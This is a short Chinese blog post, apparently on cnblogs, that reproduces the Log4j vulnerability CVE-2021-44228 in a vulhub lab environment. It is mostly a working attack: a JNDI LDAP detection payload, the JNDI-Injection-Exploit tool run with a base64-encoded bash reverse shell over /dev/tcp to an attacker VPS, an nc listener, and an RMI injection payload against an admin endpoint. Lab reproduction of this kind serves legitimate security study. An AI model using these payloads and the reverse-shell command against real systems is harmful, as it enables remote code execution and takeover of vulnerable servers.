利用vulhub进行log4j复现

log4j(CVE-2021-44228)

先利用DNSlog测试是否存在该漏洞：

传入payload：
url/admin/cores?action=${jndi:ldap://(获取到的dns域名)/exp}

回到dnslog查看是否有解析记录

证明漏洞存在！

工具地址：

 https://github.com/welk1n/JNDI-Injection-Exploit

在JNDI-Injection-Exploit目录下执行

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,[经过base64编码后的命令]}|{base64,-d}|bash" -A [你的vpsip]

比如：

bash -i >& /dev/tcp/127.0.0.1/6666 0>&1 ---> YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjcuMC4wLjEvNjY2NiAwPiYx

另起终端，打开nc -lvp 端口进行监听

用最下面这个payload

传入payload:

url/admin/cores?action=${jndi:(直接粘贴rmi)}

成功反弹：

posted @ 2022-06-17 11:23 森sen 阅读(425) 评论(0) 编辑收藏举报

刷新页面返回顶部

登录后才能查看或发表评论，立即登录或者逛逛博客园首页

相关博文：

· 记一道利用原生类的web题

· thinkphp2

· CVE-2021-44228 Log4j 复现及原理

· 【漏洞复现】Apache log4j2[CVE-2021-44228]

· Vulhub log4j2漏洞复现

阅读排行：
· TypeScript + Deepseek 打造卜卦网站：技术与玄学的结合
· 阿里巴巴 QwQ-32B真的超越了 DeepSeek R-1吗？
· 【译】Visual Studio 中新的强大生产力特性
· 【设计模式】告别冗长if-else语句：使用策略模式优化代码结构
· 10年+ .NET Coder 心语 ── 封装的思维：从隐藏、稳定开始理解其本质意义